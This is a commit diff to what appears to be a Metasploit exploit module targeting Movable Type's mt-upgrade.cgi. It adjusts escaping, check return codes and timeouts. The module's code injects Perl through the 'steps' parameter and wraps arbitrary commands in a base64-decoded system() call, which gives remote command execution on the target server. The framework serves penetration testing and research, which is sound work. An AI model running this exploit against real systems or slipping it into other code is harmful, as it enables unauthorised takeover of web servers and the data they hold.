- applied all the changes from rapid7#1363

- some extra escaping for the sake of it
- removed the timeout in http_send_raw

Author: kacpern

modules/exploits/multi/http/movabletype_upgrade_exec.rb

@@ -33,7 +33,7 @@ def initialize(info = {})
 				[
 					'Kacper Nowak',
 					'Nick Blundell',
-					"Gary O'Leary-Steele"
+					'Gary O\'Leary-Steele'
 				],
 			'References'     =>
 				[
@@ -76,7 +76,7 @@ def check
 		begin
 			res = http_send_raw(fingerprint)
 		rescue Rex::ConnectionError
-			return
+			return Exploit::CheckCode::Unknown
 		end
 		if (res)
 			if (res.code == 200 and res.body =~ /Can't locate object method \\"dbi_driver\\" via package \\"#{fingerprint}\\" at/)
@@ -86,6 +86,8 @@ def check
 			else
 				return Exploit::CheckCode::Safe
 			end
+		else
+			return Exploit::CheckCode::Unknown
 		end
 	end
 
@@ -95,8 +97,9 @@ def exploit
 		http_send_cmd(payload.encoded)
 	end
 
-	def http_send_raw(cmd, timeout=20)
+	def http_send_raw(cmd)
 		path = normalize_uri(target_uri.path) + '/mt-upgrade.cgi'
+		pay = cmd.gsub('\\', '\\\\').gsub('"', '\"')
 		send_request_cgi(
 			{
 				'uri'       => path,
@@ -105,15 +108,15 @@ def http_send_raw(cmd, timeout=20)
 					{
 						'__mode'     => 'run_actions',
 						'installing' => '1',
-						'steps'      => %{[["core_drop_meta_for_table","class","#{cmd.gsub('"', '\"')}"]]}
+						'steps'      => %{[["core_drop_meta_for_table","class","#{pay}"]]}
 					}
-			}, timeout)
+			})
 	end
 
 	def http_send_cmd(cmd)
 		pay = 'v0;use MIME::Base64;system(decode_base64(q('
 		pay << Rex::Text.encode_base64(cmd)
 		pay << ')));return 0'
-		http_send_raw(pay, 0.5)
+		http_send_raw(pay)
 	end
 end